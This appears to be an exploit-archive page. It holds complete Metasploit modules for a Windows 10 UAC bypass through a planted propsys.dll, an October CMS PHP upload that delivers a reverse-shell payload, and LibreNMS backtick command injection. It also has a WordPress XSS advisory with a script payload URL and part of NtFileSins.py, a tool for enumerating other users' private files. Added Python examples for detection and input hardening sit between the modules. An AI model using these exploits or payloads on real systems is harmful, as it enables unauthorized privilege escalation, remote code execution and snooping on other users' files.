Channel: Exploit Collector

Microsoft Windows 10 UAC Protection Bypass Via Windows Store

This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll).


MD5 | b188fc5d0237e2798ceb17453907bcbe

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info( info,
        'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
        'Description' => %q{
          This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
          is run with the "autoElevate" property set to true, however it can be moved to
          a new Windows directory containing a space (C:\Windows \System32\) where, upon
          execution, it will load our payload dll (propsys.dll).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ACTIVELabs', # discovery
          'sailay1996', # poc
          'timwr', # metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [[ 'Automatic', {} ]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'WfsDelay' => 15
        },
        'DisclosureDate' => 'Aug 22 2019',
        'Notes' =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
        },
        'References' => [
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
          ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
        ],
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  def exploit
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
    end

    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    exploit_win_dir = "C:\\Windows \\"
    exploit_dir = "C:\\Windows \\System32\\"
    exploit_file = exploit_dir + "WSReset.exe"
    unless exists? exploit_win_dir
      print_status("Creating directory '#{exploit_win_dir}'...")
      session.fs.dir.mkdir(exploit_win_dir)
    end
    unless exists? exploit_dir
      print_status("Creating directory '#{exploit_dir}'...")
      session.fs.dir.mkdir(exploit_dir)
    end
    unless exists? exploit_file
      session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
    end

    payload_dll = "C:\\Windows \\System32\\propsys.dll"
    print_status("Creating payload '#{payload_dll}'...")
    payload = generate_payload_dll
    write_file(payload_dll, payload)
    print_status("Executing WSReset.exe...")
    begin
      session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true})
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
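
Detection logic for the directory trick described above, added here as an example and not part of the Metasploit module: it flags process and image-load paths in which a directory component ends in a space (or dot) while the stripped path falls under C:\Windows\. The event records are constructed, their field names are modelled on Sysmon events 1 and 7, and the function names and the C: system drive are assumptions.

```python
# Added example (not part of the Metasploit module): flag "mock trusted directory"
# paths such as C:\Windows \System32\ in process-creation and image-load telemetry.

TRUSTED_ROOT = "c:\\windows\\"  # assumption: Windows is installed on C:
PATH_FIELDS = ("Image", "ImageLoaded", "ParentImage")  # Sysmon-style field names


def _components(path):
    """Split a Windows path into components, accepting either slash style."""
    if path.startswith("\\\\?\\"):  # drop the extended-length prefix if present
        path = path[4:]
    return path.replace("/", "\\").split("\\")


def padded_components(path):
    """Directory components ending in a space or dot, e.g. 'Windows '."""
    return [c for c in _components(path)[:-1]
            if c not in ("", ".", "..") and c != c.rstrip(" .")]


def stripped(path):
    """Lower-cased path with trailing spaces and dots removed from each component."""
    return "\\".join(c if c in (".", "..") else c.rstrip(" .")
                     for c in _components(path)).lower()


def is_mock_trusted(path):
    """True when a padded directory makes the path resemble one under C:\\Windows\\."""
    return bool(padded_components(path)) and stripped(path).startswith(TRUSTED_ROOT)


def scan(events):
    """Return one finding per path field that points into a look-alike directory."""
    findings = []
    for index, event in enumerate(events):
        for field in PATH_FIELDS:
            path = event.get(field)
            if path and is_mock_trusted(path):
                findings.append({"index": index, "field": field, "path": path,
                                 "resembles": stripped(path)})
    return findings


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"event_id": 1, "Image": r"C:\Windows\System32\WSReset.exe"},
    {"event_id": 1, "Image": r"C:\Windows \System32\WSReset.exe"},
    {"event_id": 7, "Image": r"C:\Windows \System32\WSReset.exe",
     "ImageLoaded": r"C:\Windows \System32\propsys.dll"},
    {"event_id": 7, "Image": r"C:\Windows\System32\WSReset.exe",
     "ImageLoaded": r"C:\Windows\System32\propsys.dll"},
    {"event_id": 1, "Image": r"C:\Program Files\Vendor App\tool.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("event %(index)d %(field)s: %(path)r resembles %(resembles)r" % finding)
```

A space inside a component ("Program Files") is not flagged; only padding at the end of a directory name is.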


October CMS Upload Protection Bypass Code Execution

This Metasploit module exploits an upload protection bypass in October CMS. An authenticated user with permission to upload and manage media contents can upload various files on the server. The application prevents the user from uploading PHP code by checking the file extension, but it uses a blacklist-based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/Definitions.php:blockedExtensions(). This module was tested on October CMS version 1.0.412 on Ubuntu.


MD5 | 577544e8738172a5269aa660dcf271ea

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'October CMS Upload Protection Bypass Code Execution',
      'Description' => %q{
        This module exploits an Authenticated user with permission to upload and manage media contents can
        upload various files on the server. Application prevents the user from
        uploading PHP code by checking the file extension. It uses black-list based
        approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
        Definitions.php:blockedExtensions().
        This module was tested on October CMS version v1.0.412 on Ubuntu.
      },
      'Author' =>
        [
          'Anti Räis', # Discovery
          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
          'SecureLayer7.net' # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['EDB','41936'],
          ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
          ['CVE','2017-1000119']
        ],
      'DefaultOptions' =>
        {
          'SSL' => false,
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'ENCODER' => 'php/base64',
        },
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' =>
        [
          [ 'October CMS v1.0.412', { } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 25 2017'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js')
      })
    rescue
      vprint_error('Unable to access the /assets/js/framework.js file')
      return CheckCode::Unknown
    end

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
      'method' => 'GET'
    })

    if res.nil?
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
    end

    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?

    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
    vprint_good("Token for login : #{token}")
    vprint_good("Session Key for login : #{session}")

    cookies = res.get_cookies
    vprint_status('Trying to Login ......')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
      'cookie' => cookies,
      'vars_post' => Hash[{
        '_session_key' => session,
        '_token' => token,
        'postback' => '1',
        'login' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }.to_a.shuffle]
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # if we redirect. then we assume we have authenticated cookie.
    if res.code == 302
      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
    end
  end


  def exploit
    cookies = login

    evil = "<?php #{payload.encoded} ?>"
    payload_name = "#{rand_text_alpha(8..13)}.php5"

    post_data = Rex::MIME::Message.new
    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload
    data = post_data.to_s

    register_files_for_cleanup(payload_name)
    vprint_status("Trying to upload malicious #{payload_name} file ....")
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
      'method' => 'POST',
      'cookie' => cookies,
      'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' },
      'Connection' => 'close',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    send_request_cgi({
      'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
      'method' => 'GET'
    })
  end
end
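
The blacklist weakness described above, shown next to an allowlist policy; this is an added example, not October CMS code and not part of the module. The blocklist below is constructed for illustration and is not the contents of blockedExtensions(); the allowlist, the function names and the file names are assumptions.

```python
import os
import secrets

# Constructed blocklist for illustration only; NOT the list in October CMS.
SAMPLE_BLOCKLIST = {"php", "php3", "php4", "phtml", "exe", "sh"}
# Assumed allowlist for a media library.
MEDIA_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf", "mp3", "mp4"}


def extension(filename):
    """Lower-cased final extension after dropping any path, padding and trailing dots."""
    name = os.path.basename(filename.replace("\\", "/")).strip().rstrip(". ")
    _, dot, ext = name.rpartition(".")
    return ext.lower() if dot else ""


def blocklist_allows(filename):
    """Blacklist policy: accept anything whose extension is not explicitly listed."""
    return extension(filename) not in SAMPLE_BLOCKLIST


def allowlist_allows(filename):
    """Allowlist policy: accept only extensions the media library actually needs."""
    return extension(filename) in MEDIA_ALLOWLIST


def storage_name(filename):
    """Server-chosen name for an accepted upload; the client's name is never reused."""
    if not allowlist_allows(filename):
        raise ValueError("extension not permitted: %r" % extension(filename))
    return "%s.%s" % (secrets.token_hex(16), extension(filename))


def compare(filenames):
    """Map each name to (blocklist verdict, allowlist verdict)."""
    return {n: (blocklist_allows(n), allowlist_allows(n)) for n in filenames}


# Constructed upload names.
SAMPLE_UPLOADS = ["holiday.jpg", "report.php5", "Report.PHP5", "notes.php.",
                  ".htaccess", "archive.tar.gz", "README"]

if __name__ == "__main__":
    for name, (by_block, by_allow) in compare(SAMPLE_UPLOADS).items():
        print("%-16s blocklist=%-5s allowlist=%s" % (name, by_block, by_allow))
```

Every variant the blocklist author did not think of passes the first policy and fails the second; serving the media directory without a script handler removes the remaining risk from files that are accepted.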

LibreNMS Collectd Command Injection

This Metasploit module exploits a command injection vulnerability in the Collectd graphing functionality in LibreNMS. The to and from parameters used to define the range for a graph are sanitized using the mysqli_escape_real_string() function, which permits backticks. These parameters are used as part of a shell command that gets executed via the passthru() function, which can result in code execution.


MD5 | 4480c86153083ea98f618156ca80c47b

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'LibreNMS Collectd Command Injection',
      'Description' => %q(
        This module exploits a command injection vulnerability in the
        Collectd graphing functionality in LibreNMS.

        The `to` and `from` parameters used to define the range for
        a graph are sanitized using the `mysqli_escape_real_string()`
        function, which permits backticks. These parameters are used
        as part of a shell command that gets executed via the `passthru()`
        function, which can result in code execution.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Eldar Marcussen', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2019-10669' ],
          [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ]
        ],
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' =>
        [
          [ 'Linux',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }
            }
          ]
        ],
      'DisclosureDate' => '2019-07-15',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
        OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
        OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
      ])
  end

  def check
    res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path)
    return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms')

    about_res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'pages', 'about.inc.php')
    )

    return Exploit::CheckCode::Detected unless about_res && about_res.code == 200

    version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/)
    return Exploit::CheckCode::Detected unless version && version.length > 1
    vprint_status("LibreNMS version #{version[1]} detected")
    version = Gem::Version.new(version[1])

    return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')
  end

  def login
    login_uri = normalize_uri(target_uri.path, 'login')
    res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200

    cookies = res.get_cookies
    login_res = send_request_cgi(
      'method' => 'POST',
      'uri' => login_uri,
      'cookie' => cookies,
      'vars_post' =>
      {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    )

    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302

    cookies = login_res.get_cookies
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'cookie' => cookies
    )
    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')

    print_status('Successfully logged into LibreNMS. Storing credentials...')
    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
    login_res.get_cookies
  end

  def get_version
    uri = normalize_uri(target_uri.path, 'about')

    res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
    fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200

    html = res.get_html_document
    version = html.search('tr//td//a')
    fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty?
    version.each do |e|
      return $1 if e.text =~ /(\d+\.\d+\.?\d*)/
    end
  end

  def get_device_ids
    version = get_version
    print_status("LibreNMS version: #{version}")

    if version && Gem::Version.new(version) < Gem::Version.new('1.50')
      dev_uri = normalize_uri(target_uri.path, 'ajax_table.php')
      format = '+list_detail'
    else
      dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device')
      format = 'list_detail'
    end

    dev_res = send_request_cgi(
      'method' => 'POST',
      'uri' => dev_uri,
      'cookie' => @cookies,
      'vars_post' =>
      {
        'id' => 'devices',
        'format' => format,
        'current' => '1',
        'sort[hostname]' => 'asc',
        'rowCount' => 50
      }
    )

    fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200

    json = JSON.parse(dev_res.body)
    fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty?

    json = json['rows']
    fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty?

    hosts = []
    json.each do |row|
      hostname = row['hostname']
      next if hostname.nil?

      id = hostname.match('href=\"device\/device=(\d+)\/')
      next unless id && id.length > 1
      hosts << id[1]
    end

    fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty?

    hosts
  end

  def get_plugin_info(id)
    uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd")

    res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
    return unless res && res.code == 200

    html = res.get_html_document
    plugin_link = html.at('div[@class="col-md-3"]//a/@href')
    return if plugin_link.nil?

    plugin_link = plugin_link.value
    plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }]
    c_plugin = plugin_hash['c_plugin']
    c_type = plugin_hash['c_type']
    c_type_instance = plugin_hash['c_type_instance'] || ''
    c_plugin_instance = plugin_hash['c_plugin_instance'] || ''

    return c_plugin, c_type, c_plugin_instance, c_type_instance
  end

  def exploit
    req_uri = normalize_uri(target_uri.path, 'graph.php')
    @cookies = login

    dev_ids = get_device_ids

    collectd_device = -1
    plugin_name = nil
    plugin_type = nil
    plugin_instance = nil
    plugin_type_inst = nil
    dev_ids.each do |device|
      collectd_device = device
      plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device)
      break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst)
      collectd_device = -1
    end

    fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1
    print_status("Sending payload via device #{collectd_device}")

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => req_uri,
      'cookie' => @cookies,
      'vars_get' =>
      {
        'device' => collectd_device,
        'type' => 'device_collectd',
        'to' => Rex::Text.rand_text_numeric(10),
        'from' => "1`#{payload.encoded}`",
        'c_plugin' => plugin_name,
        'c_type' => plugin_type,
        'c_plugin_instance' => plugin_instance,
        'c_type_instance' => plugin_type_inst
      }
    )
  end
end
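
Why SQL escaping does not protect a shell command, and what does; this is an added example, not LibreNMS code and not part of the module. `sql_escape` models the character set that PHP's `mysqli_real_escape_string()` escapes (the function the description refers to), the graph range is assumed to be a pair of Unix timestamps, and the `rrdtool` argument list and all function names are hypothetical.

```python
import re
import shlex

# Characters escaped by PHP's mysqli_real_escape_string(): NUL, LF, CR, backslash,
# single quote, double quote and Ctrl-Z. The backtick is not among them.
_SQL_ESCAPES = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
                "'": "\\'", '"': '\\"', "\x1a": "\\Z"}

# Subset of characters with special meaning to a POSIX shell in an unquoted word.
_SHELL_ACTIVE = set("`$;|&<>()")

_EPOCH = re.compile(r"[0-9]{1,10}")

# Constructed input in the shape the module sends for the `from` parameter.
HOSTILE_FROM = "1`echo injected`"


def sql_escape(value):
    """Model of SQL string escaping: right for SQL literals, irrelevant to a shell."""
    return "".join(_SQL_ESCAPES.get(ch, ch) for ch in value)


def shell_active_after_sql_escape(value):
    """Shell metacharacters that are still present after SQL escaping."""
    return sorted(set(sql_escape(value)) & _SHELL_ACTIVE)


def parse_epoch(value):
    """Accept only a plain decimal Unix timestamp; anything else is rejected."""
    if not isinstance(value, str) or not _EPOCH.fullmatch(value):
        raise ValueError("graph range must be a Unix timestamp")
    return int(value)


def build_graph_argv(frm, to):
    """Hypothetical graph command as an argument list, so no shell parses the values."""
    start, end = parse_epoch(frm), parse_epoch(to)
    if start >= end:
        raise ValueError("'from' must be earlier than 'to'")
    return ["rrdtool", "graph", "-", "--start", str(start), "--end", str(end)]


if __name__ == "__main__":
    # 1. The SQL escaper returns the value unchanged, backticks included.
    print("sql_escape :", sql_escape(HOSTILE_FROM), shell_active_after_sql_escape(HOSTILE_FROM))
    # 2. An encoder for the shell context neutralises it by single-quoting.
    print("shlex.quote:", shlex.quote(HOSTILE_FROM))
    # 3. Type validation rejects it before any command is built.
    try:
        build_graph_argv(HOSTILE_FROM, "1563152400")
    except ValueError as err:
        print("rejected   :", err)
    print("argv       :", build_graph_argv("1563148800", "1563152400"))
```

The argument list would be handed to `subprocess.run(argv)` without `shell=True`; the PHP counterparts of steps 2 and 3 are `escapeshellarg()` and an integer cast or `ctype_digit()` check.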

WordPress Ellipsis Human Presence Technology 2.0.8 Cross Site Scripting

WordPress Ellipsis Human Presence Technology plugin version 2.0.8 suffers from a cross site scripting vulnerability.


MD5 | dc36959e2086cc4843fd3a975c77e633

Class: Input Validation Error
Remote: Yes

Credit: Ricardo Sanchez
Vulnerable: Ellipsis human presence technology 2.0.8

Ellipsis human presence technology is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue, follow these steps:
The XSS is reflected because the URL value is not filtered correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=
"%20><script>alert("R1XS4.COM")</script>

Windows File Enumeration Intel Gathering Tool 2.1

NtFileSins.py is a Windows file enumeration intel gathering tool.


MD5 | 4201b17ce645fae17a4c92742d9a6c79

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
# 2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 #
# By John Page (aka hyp3rlinx) #
# Apparition Security #
#======================================================================#

BANNER='''
_ _______________ __ _____ _
/ | / /_ __/ ____(_) /__ / ___/(_)___ _____
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1
By hyp3rlinx
ApparitionSec
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a "<name.ext>"'
    print "-u victim -d Downloads -a <name.ext> -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a <.name>"
    print "-u victim -d Searches -a <name>.search-ms"
    print "-u victim -d . -a <name.ext>"
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
    parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
    parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
    parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
    parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
    parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
    parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
    parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
    return parser.parse_args()


def access(j):
    result=""
    try:
        p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
        stderr,stdout = p.communicate()
        result = stdout.strip()
    except Exception as e:
        #print str(e)
        pass
    return result


def artifacts_from_file(artifacts_file, bflag, specific_ext):
    try:
        f=open(artifacts_file, "r")
        for a in f:
            idx = a.rfind(".")
            a = a.strip()
            if a != "":
                if specific_ext:
                    if idx==-1:
                        a = a + specific_ext
                    else:
                        #replace existing ext
                        a = a[:idx] + specific_ext
                if bflag:
                    ARTIFACTS_SET.add(a)
                else:
                    ARTIFACTS_SET.add(a)
        f.close()
    except Exception as e:
        print str(e)
        exit()


def save():
    try:
        f=open(REPORT, "w")
        for j in found_set:
            f.write(j+"\n")
        f.close()
    except Exception as e:
        print str(e)


def recon_msg(s):
    if s == 0:
        return "Access is denied."
    else:
        return "\t[*] Artifact exists ==>"


def echo_results(args, res, x, i):
    global sin_cnt
    if res=="":
        print "\t[!] No NTFS message, you must already be admin, then this script is not required."
        exit()
    if "not recognized as an internal or external command" in res:
        print "\t[!] You must target users with higher privileges than yours."
        exit()
    if res != recon_msg(0):
        if args.verbose:
            print "\t"+res
        else:
            if args.notfound:
                print "\t[-] not found: " + x +"/"+ i
    else:
        sin_cnt += 1
        if args.save or args.zone_identifier:
            found_set.add(x+"/"+i)
        if args.verbose:
            print recon_msg(1)+ x+"/"+i
            print "\t"+res
        else:
            print recon_msg(1)+ x+"/"+i


def valid_artifact_name(sin,args):
    idx = "." in sin
    if re.findall(r"[/\\*?:<>|]", sin):
        print "\t[!] Skipping: disallowed file name character."
        return False
    if not idx and not args.built_in_ext and not args.specific_ext:
        print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
        print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
    if not args.built_in_ext:
        if sin[-1] == ".":
            print "\t[!] Skipping: "+sin+" non valid file name."
            return False
    return True


def search_missing_ext(path,args,i):
    for x in path:
        for e in EXTS:
            res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
            echo_results(args, res, x, i+e)


#Check if the found artifact was downloaded from internet
